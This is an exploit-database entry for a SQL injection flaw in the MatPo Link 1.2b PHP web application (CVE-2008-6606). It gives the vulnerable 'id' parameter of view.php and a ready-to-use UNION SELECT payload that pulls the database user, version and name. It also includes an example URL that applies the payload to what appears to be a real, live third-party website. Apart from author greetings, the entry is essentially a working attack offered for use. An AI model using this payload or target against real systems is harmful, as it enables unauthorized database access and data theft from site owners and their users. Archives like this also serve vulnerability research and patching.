MatPo Link 1.2b - SQL Injection

Author: ZoRLu
type: webapps
platform: php
port: 
date_added: 2008-11-02  
date_updated: 2016-12-30  
verified: 1  
codes: OSVDB-53406;CVE-2008-6606  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6967.txt  

[~] MatPo Link Version 1.2 Beta Remote Sql inj.
[~]
[~] view.php (id)
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/view.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

example:

http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-03]